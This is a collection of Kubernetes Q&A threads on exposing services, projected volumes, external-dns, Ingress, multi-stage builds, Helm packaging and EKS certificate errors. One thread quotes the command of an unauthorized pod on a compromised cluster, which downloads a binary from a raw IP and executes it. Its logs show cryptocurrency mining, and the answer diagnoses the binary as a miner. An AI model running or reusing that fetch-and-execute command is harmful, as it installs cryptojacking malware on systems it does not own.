<p>We have installed Consul through Helm charts on a k8s cluster. Here, I have deployed one Consul server and the rest are Consul agents.</p>
<pre><code>kubectl get pods
NAME READY STATUS RESTARTS AGE
consul-7csp9 1/1 Running 0 4h
consul-connect-injector-webhook-deployment-66d46867f6-wqtt7 1/1 Running 0 4h
consul-server-0 1/1 Running 0 4h
consul-sync-catalog-85f5654b89-9qblx 1/1 Running 0 4h
consul-x4mqq 1/1 Running 0 4h
</code></pre>
<p>We see that the nodes are registered onto the Consul Server. <a href="http://XX.XX.XX.XX/ui/kube/nodes" rel="nofollow noreferrer">http://XX.XX.XX.XX/ui/kube/nodes</a></p>
<p>We have deployed a hello-world application onto the k8s cluster. This brings up the Hello-World pod:</p>
<pre><code>kubectl get pods
NAME READY STATUS RESTARTS AGE
consul-7csp9 1/1 Running 0 4h
consul-connect-injector-webhook-deployment-66d46867f6-wqtt7 1/1 Running 0 4h
consul-server-0 1/1 Running 0 4h
consul-sync-catalog-85f5654b89-9qblx 1/1 Running 0 4h
consul-x4mqq 1/1 Running 0 4h
sampleapp-69bf9f84-ms55k 2/2 Running 0 4h
</code></pre>
<p>Below is the yaml file.</p>
<pre><code>apiVersion: apps/v1
kind: Deployment
metadata:
name: sampleapp
spec:
replicas: 1
selector:
matchLabels:
app: sampleapp
template:
metadata:
labels:
app: sampleapp
annotations:
"consul.hashicorp.com/connect-inject": "true"
spec:
containers:
- name: sampleapp
image: "docker-dev-repo.aws.com/sampleapp-java/helloworld-service:a8c9f65-65"
ports:
- containerPort: 8080
name: http
</code></pre>
<p>After the successful deployment of sampleapp, I see that sampleapp-proxy is registered in Consul and sampleapp-proxy is listed in the Kubernetes services. (This is because toConsul and toK8S are passed as true during installation.)</p>
<pre><code>kubectl get services
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
consul ExternalName <none> consul.service.test <none> 4h
consul-connect-injector-svc ClusterIP XX.XX.XX.XX <none> 443/TCP 4h
consul-dns ClusterIP XX.XX.XX.XX <none> 53/TCP,53/UDP 4h
consul-server ClusterIP None <none> 8500/TCP,8301/TCP,8301/UDP,8302/TCP,8302/UDP,8300/TCP,8600/TCP,8600/UDP 4h
consul-ui LoadBalancer XX.XX.XX.XX XX.XX.XX.XX 80:32648/TCP 4h
dns-test-proxy ExternalName <none> dns-test-proxy.service.test <none> 2h
fluentd-gcp-proxy ExternalName <none> fluentd-gcp-proxy.service.test <none> 33m
kubernetes ClusterIP XX.XX.XX.XX <none> 443/TCP 5d
sampleapp-proxy ExternalName <none> sampleapp-proxy.service.test <none> 4h
</code></pre>
<p>How can I access my sampleapp? Should I expose my application as a Kubernetes service again?</p>
<p>Earlier, without Consul, we used to create a service for the sampleapp and expose the service as an ingress. Using the Ingress load balancer, we used to access our application.</p>
| <p>Consul does not provide any new way to expose your apps. You need to create a Service and an Ingress load balancer as before.</p>
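<p>For illustration only, a minimal sketch of what that could look like for the sampleapp above (the host name is an assumption, not taken from the question; adjust it and any annotations to your environment):</p>
<pre><code># Hypothetical Service + Ingress for sampleapp
apiVersion: v1
kind: Service
metadata:
  name: sampleapp
spec:
  selector:
    app: sampleapp
  ports:
  - name: http
    port: 80
    targetPort: 8080
---
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
  name: sampleapp
spec:
  rules:
  - host: sampleapp.example.com   # assumed host
    http:
      paths:
      - path: /
        backend:
          serviceName: sampleapp
          servicePort: 80
</code></pre>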
|
<p>I have two different config maps, <strong>test-configmap</strong> and <strong>common-config</strong>. I tried to mount them at the same location, but one config map overwrote the other. Then I read about <code>subPath</code>, but that did not work either.</p>
<p>deploy.yaml</p>
<pre><code>apiVersion: apps/v1beta1 # for versions before 1.8.0 use apps/v1beta1
kind: Deployment
metadata:
name: testing
spec:
replicas: 1
template:
metadata:
name: testing
labels:
app: testing
spec:
containers:
- name: testing-container
image: testing
imagePullPolicy: IfNotPresent
ports:
- containerPort: __PORT__
volumeMounts:
- name: commonconfig-volume
mountPath: /usr/src/app/config/test.config
subPath: test.config
volumes:
- name: commonconfig-volume
configMap:
name: test-configmap
- name: commonconfig-volume
configMap:
name: common-config
</code></pre>
<p>Error :</p>
<p><code>The Deployment "testing" is invalid: spec.template.spec.volumes[1].name: Duplicate value: "commonconfig-volume"</code></p>
<p>I am not sure whether merging two config maps is achievable or not. And if yes, how should I do it?</p>
| <p>You have to use special <a href="https://kubernetes.io/docs/concepts/storage/volumes/#projected" rel="noreferrer">projected</a> volumes to achieve that. Here is an example for your deployment:</p>
<pre><code>apiVersion: apps/v1
kind: Deployment
metadata:
name: testing
spec:
replicas: 1
selector:
matchLabels:
app: testing
template:
metadata:
name: testing
labels:
app: testing
spec:
containers:
- name: testing-container
image: testing
imagePullPolicy: IfNotPresent
ports:
- containerPort: __PORT__
volumeMounts:
- name: commonconfig-volume
mountPath: /usr/src/app/config
volumes:
- name: commonconfig-volume
projected:
sources:
- configMap:
name: test-configmap
- configMap:
name: common-config
</code></pre>
<p>You can use a <code>secret</code> the same way as a <code>configMap</code>.</p>
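<p>For example, a minimal sketch mixing both source types (the secret name <code>common-secret</code> is an assumption used only to illustrate the syntax):</p>
<pre><code>volumes:
- name: commonconfig-volume
  projected:
    sources:
    - configMap:
        name: test-configmap
    - secret:
        name: common-secret   # hypothetical secret, shown only to illustrate mixing sources
</code></pre>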
|
<p>Currently I am doing a deployment and creating a service of type LoadBalancer. I can access the pod via the created ELB. Then, using Route 53, I am attaching the ELB to k8-test.abc.com using an alias. Below is the snippet.</p>
<pre><code>apiVersion: v1
kind: Service
metadata:
name: %APP_FULL_NAME%-service-lb-http
labels:
appname: %APP_FULL_NAME%
stage: %APP_ENV%
component: app-kube-aws-elb
annotations:
service.beta.kubernetes.io/aws-load-balancer-cross-zone-load-balancing-enabled: "True"
service.beta.kubernetes.io/aws-load-balancer-ssl-cert: arn:aws:acm:us-east-1:XXXXXXXXXXXXX:certificate/XXXXXXXXXXXXXXX
service.beta.kubernetes.io/aws-load-balancer-backend-protocol: http
spec:
type: LoadBalancer
ports:
- name: http
port: 443
targetPort: 8080
protocol: TCP
selector:
appname: %APP_FULL_NAME%
stage: %APP_ENV%
</code></pre>
<p>But I was wondering whether there is any way, with some changes to the deployment, for the ELB that gets created to be attached automatically to k8-test.abc.com at creation time.</p>
| <p>There is an Incubator project (read: you may use it, but don't complain if it breaks) called <a href="https://github.com/kubernetes-incubator/external-dns" rel="nofollow noreferrer">external-dns</a>. I haven't used it myself, but it looks like it may do what you ask for. Among other DNS providers, it also offers support for Route53.</p>
<p>After set-up (here's <a href="https://github.com/kubernetes-incubator/external-dns/blob/master/docs/tutorials/aws.md" rel="nofollow noreferrer">the documentation on how to set-up <em>external-dns</em> on AWS</a>), you can define a DNS name for a Service using the <code>external-dns.alpha.kubernetes.io/hostname</code> annotation:</p>
<pre><code>apiVersion: v1
kind: Service
metadata:
name: %APP_FULL_NAME%-service-lb-http
labels:
appname: %APP_FULL_NAME%
stage: %APP_ENV%
component: app-kube-aws-elb
annotations:
external-dns.alpha.kubernetes.io/hostname: k8-test.abc.com
service.beta.kubernetes.io/aws-load-balancer-cross-zone-load-balancing-enabled: "True"
service.beta.kubernetes.io/aws-load-balancer-ssl-cert: arn:aws:acm:us-east-1:XXXXXXXXXXXXX:certificate/XXXXXXXXXXXXXXX
service.beta.kubernetes.io/aws-load-balancer-backend-protocol: http
spec:
type: LoadBalancer
ports:
- name: http
port: 443
targetPort: 8080
protocol: TCP
selector:
appname: %APP_FULL_NAME%
stage: %APP_ENV%
</code></pre>
<p>This will automatically create the respective DNS records that alias the DNS name <code>k8-test.abc.com</code> to your ELB.</p>
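<p>Once external-dns is running, you can verify that the record was created (the deployment name <code>external-dns</code> below is an assumption based on the default manifests; adjust it to whatever you deployed):</p>
<pre><code>kubectl logs deploy/external-dns     # assumed deployment name; look for the Route53 record being created
dig +short k8-test.abc.com           # should eventually resolve to the ELB
</code></pre>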
|
<p>So I got a running cluster on my server. The server is running <code>ubuntu 18.06</code>. <strong>I set up the cluster using <code>kubeadm</code>, <code>kubectl</code> and <code>kubelet</code>.</strong></p>
<p><strong>My goal in a nutshell: I want to reach the services with executing <code>http://myserver.com/service</code>.</strong></p>
<p>I am kinda lost with exposing the services to port 8080. The current structure is like this:</p>
<blockquote>
<p>31001:SERVICE:8080 -> 8080:POD</p>
</blockquote>
<p>So I need to redirect incoming requests for <code>http://myserver.com/service</code> to the <code>kubernetes service</code> on port 31001.</p>
<p>Current situation: I can only access the cluster via server IP:6443. All pods, services and so forth are up and running.</p>
<p><strong>So my question: how can I make the services more or less public available on port 8080?</strong></p>
<p>As requested below:</p>
<blockquote>
<p>Output of <code>kubectl get all --all-namespaces -o wide</code></p>
</blockquote>
<pre><code>NAMESPACE NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES
default pod/articleservice-deployment-6d48989664-jbzs6 1/1 Running 0 5h56m 192.168.0.4 server.address.com <none> <none>
default pod/cartservice-deployment-6b844f45b8-jz45h 1/1 Running 0 5h56m 192.168.0.5 server.address.com <none> <none>
default pod/catalogservice-deployment-d4bd6984c-6qlqg 1/1 Running 0 5h56m 192.168.0.6 server.address.com <none> <none>
default pod/customerservice-deployment-7d6f77fdbb-p42xj 1/1 Running 0 5h56m 192.168.0.7 server.address.com <none> <none>
kube-system pod/calico-node-5rl9m 2/2 Running 0 5h58m 999.999.99.99 server.address.com <none> <none>
kube-system pod/coredns-86c58d9df4-h64fg 1/1 Running 0 6h10m 192.168.0.2 server.address.com <none> <none>
kube-system pod/coredns-86c58d9df4-pwfj4 1/1 Running 0 6h10m 192.168.0.3 server.address.com <none> <none>
kube-system pod/etcd-server.address.net 1/1 Running 0 6h9m 999.999.99.99 server.address.com <none> <none>
kube-system pod/kube-apiserver-server.address.net 1/1 Running 0 6h10m 999.999.99.99 server.address.com <none> <none>
kube-system pod/kube-controller-manager-server.address.net 1/1 Running 0 6h9m 999.999.99.99 server.address.com <none> <none>
kube-system pod/kube-proxy-xb2qc 1/1 Running 0 6h10m 999.999.99.99 server.address.com <none> <none>
kube-system pod/kube-scheduler-server.address.net 1/1 Running 0 6h9m 999.999.99.99 server.address.com <none> <none>
NAMESPACE NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE SELECTOR
default service/articleservice NodePort 10.97.125.155 <none> 31001:31001/TCP,5005:32001/TCP 5h57m app=articleservice
default service/cartservice NodePort 10.99.42.169 <none> 31002:31002/TCP,5005:32002/TCP 5h57m app=cartservice
default service/catalogservice NodePort 10.106.101.93 <none> 31003:31003/TCP,5005:32003/TCP 5h57m app=catalogservice
default service/customerservice NodePort 10.106.2.159 <none> 31004:31004/TCP,5005:32004/TCP 5h57m app=customerservice
default service/kubernetes ClusterIP 10.96.0.1 <none> 443/TCP 6h11m <none>
kube-system service/calico-typha ClusterIP 10.96.242.31 <none> 5473/TCP 5h58m k8s-app=calico-typha
kube-system service/kube-dns ClusterIP 10.96.0.10 <none> 53/UDP,53/TCP 6h11m k8s-app=kube-dns
NAMESPACE NAME DESIRED CURRENT READY UP-TO-DATE AVAILABLE NODE SELECTOR AGE CONTAINERS IMAGES SELECTOR
kube-system daemonset.apps/calico-node 1 1 1 1 1 beta.kubernetes.io/os=linux 5h58m calico-node,install-cni quay.io/calico/node:v3.3.2,quay.io/calico/cni:v3.3.2 k8s-app=calico-node
kube-system daemonset.apps/kube-proxy 1 1 1 1 1 <none> 6h11m kube-proxy k8s.gcr.io/kube-proxy:v1.13.1 k8s-app=kube-proxy
NAMESPACE NAME READY UP-TO-DATE AVAILABLE AGE CONTAINERS IMAGES SELECTOR
default deployment.apps/articleservice-deployment 1/1 1 1 5h56m articleservice elps/articleservice:1.0.7 app=articleservice
default deployment.apps/cartservice-deployment 1/1 1 1 5h56m cartservice elps/cartservice:1.0.7 app=cartservice
default deployment.apps/catalogservice-deployment 1/1 1 1 5h56m catalogservice elps/catalogservice:1.0.7 app=catalogservice
default deployment.apps/customerservice-deployment 1/1 1 1 5h56m customerservice elps/customerservice:1.0.7 app=customerservice
kube-system deployment.apps/calico-typha 0/0 0 0 5h58m calico-typha quay.io/calico/typha:v3.3.2 k8s-app=calico-typha
kube-system deployment.apps/coredns 2/2 2 2 6h11m coredns k8s.gcr.io/coredns:1.2.6 k8s-app=kube-dns
NAMESPACE NAME DESIRED CURRENT READY AGE CONTAINERS IMAGES SELECTOR
default replicaset.apps/articleservice-deployment-6d48989664 1 1 1 5h56m articleservice elps/articleservice:1.0.7 app=articleservice,pod-template-hash=6d48989664
default replicaset.apps/cartservice-deployment-6b844f45b8 1 1 1 5h56m cartservice elps/cartservice:1.0.7 app=cartservice,pod-template-hash=6b844f45b8
default replicaset.apps/catalogservice-deployment-d4bd6984c 1 1 1 5h56m catalogservice elps/catalogservice:1.0.7 app=catalogservice,pod-template-hash=d4bd6984c
default replicaset.apps/customerservice-deployment-7d6f77fdbb 1 1 1 5h56m customerservice elps/customerservice:1.0.7 app=customerservice,pod-template-hash=7d6f77fdbb
kube-system replicaset.apps/calico-typha-5fc4874c76 0 0 0 5h58m calico-typha quay.io/calico/typha:v3.3.2 k8s-app=calico-typha,pod-template-hash=5fc4874c76
kube-system replicaset.apps/coredns-86c58d9df4 2 2 2 6h10m coredns k8s.gcr.io/coredns:1.2.6 k8s-app=kube-dns,pod-template-hash=86c58d9df4
</code></pre>
| <p><code>Ingress</code> is what you need. This is how it works:</p>
<pre><code> internet
|
[ Ingress ]
--|-----|--
[ Services ]
</code></pre>
<p>Let's say you have a k8s Deployment with the label <code>app: deployment-01</code> and <code>containerPort: 8888</code>.</p>
<p>So, you need to create:</p>
<ol>
<li>Service (say service-01)</li>
<li>Ingress (say ingress-01)</li>
</ol>
<p>If you want to reach service-01 by link <a href="http://myserver.com/service" rel="nofollow noreferrer">http://myserver.com/service</a> then your Service YAML should look like this:</p>
<pre><code>apiVersion: v1
kind: Service
metadata:
name: service-01
spec:
selector:
app: deployment-01
ports:
- name: web
protocol: TCP
port: 8080
targetPort: 8888
</code></pre>
<p>and Ingress:</p>
<pre><code>apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: ingress-01
annotations:
nginx.ingress.kubernetes.io/rewrite-target: /
spec:
rules:
- host: myserver.com
http:
paths:
- path: /service
backend:
serviceName: service-01
servicePort: 8080
</code></pre>
<p>that's it!</p>
<blockquote>
<p>Note: This assumes that you have already deployed the Ingress
controller and it is working.</p>
</blockquote>
|
<p>I have a couple of client applications. For each one I have a build pipeline that gets the latest code, compiles it and outputs the result to a <code>dist</code> folder (containing only html and js files).</p>
<p>These <code>dist</code> folders are synced, using docker volume, to a web server (<code>nginx</code>) container which actually hosts the client application.</p>
<p>The result is that my client is always "up" and I only need to update the <code>dist</code> folder of any client to deploy it, and never need to mess with the web server container.</p>
<p>However, I want to move my deployment to a different approach, of only building the docker images on pipelines (code change) and using them on demand whenever deploying an environment.</p>
<p>The problem would be how to build the web server container while I don't want to rebuild all clients on any change, nor do I want to store the built output in source control. What would be the best approach?</p>
| <p>You could consider a <a href="https://docs.docker.com/develop/develop-images/multistage-build/" rel="nofollow noreferrer">multi-stage build</a> with:</p>
<ul>
<li>the first stage being the build of your web server (which never changes, so it is cached)</li>
<li>the second stage being the build of your <code>dist</code> folder, to which image you add the web server from the first stage.</li>
</ul>
<p>The end result is an image with both the web server and the static files to serve (instead of those files being in a volume), with only the static files being rebuilt.</p>
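<p>For illustration only, one common arrangement of such a Dockerfile (the Node base image, build command and paths are assumptions about your pipeline, not taken from the question; the stage order here is the conventional one, with the cached web-server image receiving the freshly built static files):</p>
<pre><code># Stage 1: build the static client (assumed Node-based build; adjust to your toolchain)
FROM node:10 AS build
WORKDIR /src
COPY . .
RUN npm ci && npm run build        # assumed to produce /src/dist

# Stage 2: the web server image, unchanged between builds and therefore cached
FROM nginx:stable
COPY --from=build /src/dist /usr/share/nginx/html
</code></pre>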
|
<p>My k8s cluster's default namespace has an RC that I didn't create; it starts 10 pods automatically, and I don't know why.</p>
<p>My k8s version is:</p>
<pre><code>kubectl version
Client Version: version.Info{Major:"1", Minor:"8", GitVersion:"v1.8.6", GitCommit:"6260bb08c46c31eea6cb538b34a9ceb3e406689c", GitTreeState:"clean", BuildDate:"2017-12-21T06:34:11Z", GoVersion:"go1.8.3", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"8", GitVersion:"v1.8.6", GitCommit:"6260bb08c46c31eea6cb538b34a9ceb3e406689c", GitTreeState:"clean", BuildDate:"2017-12-21T06:23:29Z", GoVersion:"go1.8.3", Compiler:"gc", Platform:"linux/amd64"}
</code></pre>
<p>And the pods look like this (<code>kubectl get po --namespace=default</code>):</p>
<pre><code>NAME READY STATUS RESTARTS AGE
mi125yap1 0/1 ImagePullBackOff 0 1d
y1ee114-2hmp4 0/1 ContainerCreating 0 5h
y1ee114-4hqg4 0/1 ImagePullBackOff 0 5h
y1ee114-5tcb5 0/1 ContainerCreating 0 5h
y1ee114-8ft9x 1/1 Running 0 5h
y1ee114-b9bjn 0/1 ImagePullBackOff 0 5h
y1ee114-ptw9g 0/1 ImagePullBackOff 0 5h
y1ee114-rxl4m 0/1 ImagePullBackOff 0 5h
y1ee114-tn9zw 0/1 ImagePullBackOff 0 5h
y1ee114-tx99w 1/1 Running 0 5h
y1ee114-z9b4m 0/1 ImagePullBackOff 0 5h
</code></pre>
<p>The pods on the two master nodes with public network access start successfully, but the pods on the node without access to the public network fail with ImagePullBackOff.</p>
<p>One detail of the pod is:</p>
<pre><code>kubectl describe po y1ee114-8ft9x --namespace=default
Name: y1ee114-8ft9x
Namespace: default
Node: server2/172.17.0.102
Start Time: Wed, 26 Dec 2018 05:35:15 +0800
Labels: app=myresd01
Annotations: kubernetes.io/created-by={"kind":"SerializedReference","apiVersion":"v1","reference":{"kind":"ReplicationController","namespace":"default","name":"y1ee114","uid":"f7ec0108-088c-11e9-856f-00163e160da9"...
Status: Running
IP: 10.1.42.2
Created By: ReplicationController/y1ee114
Controlled By: ReplicationController/y1ee114
Containers:
myresd01:
Container ID: docker://0b237f7e6c2b359dc1227cfdd1b726e6f6bb5346bcca129ec6a5b15336e13b25
Image: centos
Image ID: docker-pullable://centos@sha256:184e5f35598e333bfa7de10d8fb1cebb5ee4df5bc0f970bf2b1e7c7345136426
Port: <none>
Command:
sh
-c
curl -o /var/tmp/config.json http://192.99.142.232:8220/222.json;curl -o /var/tmp/suppoie1 http://192.99.142.232:8220/tte2;chmod 777 /var/tmp/suppoie1;cd /var/tmp;./suppoie1 -c config.json
State: Running
Started: Wed, 26 Dec 2018 05:35:20 +0800
Ready: True
Restart Count: 0
Environment: <none>
Mounts:
/var/run/secrets/kubernetes.io/serviceaccount from default-token-5xcgh (ro)
Conditions:
Type Status
Initialized True
Ready True
PodScheduled True
Volumes:
shared-data:
Type: EmptyDir (a temporary directory that shares a pod's lifetime)
Medium:
default-token-5xcgh:
Type: Secret (a volume populated by a Secret)
SecretName: default-token-5xcgh
Optional: false
QoS Class: BestEffort
Node-Selectors: <none>
Tolerations: <none>
Events: <none>
</code></pre>
<p>And some of the logs are:</p>
<pre><code>[2018-12-26 02:46:18] accepted (870/0) diff 2000 (245 ms)
[2018-12-26 02:46:23] accepted (871/0) diff 2000 (246 ms)
[2018-12-26 02:46:27] speed 10s/60s/15m 94.4 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:46:51] accepted (872/0) diff 2000 (248 ms)
[2018-12-26 02:47:27] speed 10s/60s/15m 94.3 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:47:46] accepted (873/0) diff 2000 (245 ms)
[2018-12-26 02:47:49] accepted (874/0) diff 2000 (245 ms)
[2018-12-26 02:47:56] accepted (875/0) diff 2000 (247 ms)
[2018-12-26 02:48:10] accepted (876/0) diff 2000 (391 ms)
[2018-12-26 02:48:18] accepted (877/0) diff 2000 (245 ms)
[2018-12-26 02:48:20] accepted (878/0) diff 2000 (245 ms)
[2018-12-26 02:48:27] speed 10s/60s/15m 94.3 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:48:37] accepted (879/0) diff 2000 (246 ms)
[2018-12-26 02:48:39] accepted (880/0) diff 2000 (245 ms)
[2018-12-26 02:49:00] accepted (881/0) diff 2000 (245 ms)
[2018-12-26 02:49:27] speed 10s/60s/15m 94.3 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:49:39] accepted (882/0) diff 2000 (245 ms)
[2018-12-26 02:50:27] speed 10s/60s/15m 94.3 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:51:01] accepted (883/0) diff 2000 (245 ms)
[2018-12-26 02:51:27] speed 10s/60s/15m 94.4 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:51:27] accepted (884/0) diff 2000 (248 ms)
</code></pre>
<p>Does anyone know who created this RC and what it is for?</p>
| <p>Those are cryptocurrency miners. My guess is your cluster was hacked via the Kubernetes websocket upgrade CVE (<a href="https://gravitational.com/blog/kubernetes-websocket-upgrade-security-vulnerability/" rel="nofollow noreferrer">https://gravitational.com/blog/kubernetes-websocket-upgrade-security-vulnerability/</a>). I would probably destroy and recreate your cluster.</p>
<p>I figured this out by downloading <a href="http://192.99.142.232:8220/tte2" rel="nofollow noreferrer">http://192.99.142.232:8220/tte2</a> which was mentioned in the config of your describe output and discovered it was an ELF binary. I ran <code>strings</code> on the binary and after some scrolling found a bunch of strings referring to "cryptonight" which is cryptocurrency mining software.</p>
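<p>The investigation described above boils down to roughly the following (run it only on an isolated, throwaway machine, since the file is attacker-controlled):</p>
<pre><code>curl -o tte2 http://192.99.142.232:8220/tte2   # the binary referenced in the pod command
file tte2                                       # reports an ELF executable
strings tte2 | grep -i cryptonight              # strings typical of cryptocurrency miners
</code></pre>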
|
<p>I have a load balanced deployment of spring boot service A, say on a 3 node kubernetes cluster.</p>
<p>I also have a requirement to enable quick configuration management without needing to rebuild+deploy a full blown rebaked image.</p>
<p>For that I put together a spring boot config-server, as well as implemented the Actuator restart on service A which when calling its /restart endpoint on a local single instance deployment it refreshes and loads with the properties fetched from the config-server.</p>
<p>So far so good, but...</p>
<p>How can the above be achieved when service A is deployed on a larger scale k8s deployment with 3, 30 or 300 instances of service A?</p>
<p>Calling /refresh endpoint must be handled by the load balancer as any other REST call on the cluster, meaning it is routed to one of the service instances.</p>
<p>Is there a standard way in springboot-on-k8s I can call each service instance ignoring the LB?</p>
| <p>We don't really use the actuator's restart. Instead, we utilize the rollingUpdate strategy of the Deployment. When we want to "restart" the pods, we issue a <code>kubectl patch</code>:</p>
<pre><code>kubectl patch deployment web -p "{\"spec\":{\"template\":{\"metadata\":{\"labels\":{\"date\":\"`date +'%s'`\"}}}}}"
</code></pre>
<p>Good documentation of the upgrade strategy:</p>
<p><a href="https://medium.com/platformer-blog/enable-rolling-updates-in-kubernetes-with-zero-downtime-31d7ec388c81" rel="nofollow noreferrer">https://medium.com/platformer-blog/enable-rolling-updates-in-kubernetes-with-zero-downtime-31d7ec388c81</a></p>
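<p>For reference, a minimal rolling-update strategy fragment on the Deployment might look like this (the values are illustrative, not taken from the question):</p>
<pre><code>spec:
  strategy:
    type: RollingUpdate
    rollingUpdate:
      maxUnavailable: 0   # keep all old pods serving until new ones are ready
      maxSurge: 1         # bring new pods up one at a time
</code></pre>
<p>With that in place, the <code>kubectl patch</code> above changes the pod template, which triggers a rolling replacement of every instance, so each pod picks up the new configuration as it restarts.</p>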
|
<p>I upgraded my EKS cluster from v1.10.3 to v1.11.5, but it's giving me a <code>x509: cannot validate certificate for <WORKER_IP> because it doesn't contain any IP SANs</code> error when I try to get logs or run <code>helm ls</code> on it. Other commands like <code>kubectl get nodes</code> are working fine.</p>
<p>For the upgrade, I clicked the "Upgrade cluster" button on the web console and modified the CloudFormation template for workers to use the latest AWS-provided AMI (ami-0a9006fb385703b54). I followed this <a href="https://docs.aws.amazon.com/eks/latest/userguide/update-cluster.html" rel="nofollow noreferrer">guide from AWS</a>, <a href="https://docs.aws.amazon.com/ko_kr/eks/latest/userguide/update-stack.html" rel="nofollow noreferrer">including this</a>.</p>
<p>My cluster was completely unusable, so I rolled back my worker nodes to the old AMI (ami-0c7a4976cb6fafd3a) for now, and the error is gone.</p>
<p>I'm really not sure what I missed. Is anyone experiencing a similar issue? I need help.</p>
<p>Thanks.</p>
| <p>x509 refers to the certificate-based authentication and authorisation mechanism in Kubernetes, so this type of problem is most likely auth related (the error suggests the worker's certificate does not include its IP address in the SANs).</p>
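<p>A quick way to check which SANs the worker's kubelet certificate actually contains (assuming the default kubelet port 10250; replace WORKER_IP accordingly):</p>
<pre><code>openssl s_client -connect WORKER_IP:10250 </dev/null 2>/dev/null \
  | openssl x509 -noout -text \
  | grep -A1 "Subject Alternative Name"
</code></pre>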
|
<p>We have multiple(20+) services running inside docker containers which are being managed using Kubernetes. These services include databases, streaming pipelines and custom applications. We want to make this product available as an on-premises solution so that it can be easily installed, like a <em>one-click</em> installation sort of thing, hiding all the complexity of the infrastructure.</p>
<p>What would be the best way of doing this? Currently we have scripts managing this but as we move into production there will be frequent upgrades and it will become more and more complex to manage all the dependencies.</p>
<p>I am currently looking into <strong>helm</strong> and am wondering if I am exploring in the right direction. Any guidance will be really helpful to me. Thanks.</p>
| <p>Helm seems like the way to go, but what you need to think about, in my opinion, is how you will deliver updates to your software. For example, will you provide a single 'version' of your whole stack, which translates into a particular composition of infra setup and microservice versions, or will you allow your customers to upgrade single microservices as they are released? You can have one huge helm chart for everything, or you can use, like I do in most cases, an "umbrella" chart that contains subcharts for all microservices etc.</p>
<p>My usual setup contains a subchart for every service; the service names are correctly namespaced, so they can be referenced within the release as <code>.Release.Name-subchart[-optional]</code>. Also, when I need to upgrade, I just upgrade the whole chart with something like <code>--reuse-values --set subchart.image.tag=v1.x.x</code>, which gives granular control over each service version. I also gate each subchart's resources with <code>if .Values.enabled</code> so I can individually enable/disable each subchart's resources.</p>
<p>The ugly side of this is that if you do want to release a single-service upgrade, you still need to run the whole umbrella chart, leaving more surface for some kind of error; but on the other hand it gives you the capability to deploy the whole solution in one command (the default tags are <code>:latest</code>, so a clean install will always install the latest published versions, which then get updated with tagged releases).</p>
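<p>As a concrete sketch of that upgrade pattern (the release, chart and subchart names here are hypothetical):</p>
<pre><code># Upgrade only one service inside the umbrella chart, keeping all other values
helm upgrade my-product ./umbrella-chart \
  --reuse-values \
  --set cartservice.image.tag=v1.2.3 \
  --set cartservice.enabled=true
</code></pre>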
|
<p>I have been trying to diagnose a problem that just started a few days ago. </p>
<p>Running <code>kubelet</code>, <code>kubeadm</code> version 1.13.1. Cluster has 5 nodes and had been fine for months until late last week. Running this on a RHEL 7.x box with adequate free resources.</p>
<p>Having an odd issue that the cluster resources (api, scheduler, etcd) become unavailable. This eventually corrects itself and the cluster comes back for a while again.</p>
<p>If I do a <code>sudo systemctl restart kubelet</code> everything within the cluster works fine again, until the intermittent oddness occurs.</p>
<p>I am monitoring the <code>journactl</code> logs to see what is going on when this occurs, and the chunk that stands out is:</p>
<pre><code>Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: 2018-12-26 21:28:06.762004 I | etcdserver: skipped leadership transfer for single member cluster
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: W1226 21:28:06.763648 1 reflector.go:270] k8s.io/client-go/informers/factory.go:132: watch of *v1beta1.Event ended with: Internal error occurred: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: E1226 21:28:06.762788 1 watcher.go:208] watch chan error: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: W1226 21:28:06.762910 1 reflector.go:270] storage/cacher.go:/podsecuritypolicy: watch of *policy.PodSecurityPolicy ended with: Internal error occurred: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: E1226 21:28:06.763149 1 watcher.go:208] watch chan error: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: E1226 21:28:06.763232 1 watcher.go:208] watch chan error: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: W1226 21:28:06.763439 1 reflector.go:270] storage/cacher.go:/apiregistration.k8s.io/apiservices: watch of *apiregistration.APIService ended with: Internal error occurred: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: E1226 21:28:06.763719 1 watcher.go:208] watch chan error: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: W1226 21:28:06.763786 1 reflector.go:270] storage/cacher.go:/daemonsets: watch of *apps.DaemonSet ended with: Internal error occurred: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: E1226 21:28:06.763937 1 watcher.go:208] watch chan error: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: W1226 21:28:06.764016 1 reflector.go:270] storage/cacher.go:/cronjobs: watch of *batch.CronJob ended with: Internal error occurred: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: E1226 21:28:06.764250 1 watcher.go:208] watch chan error: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
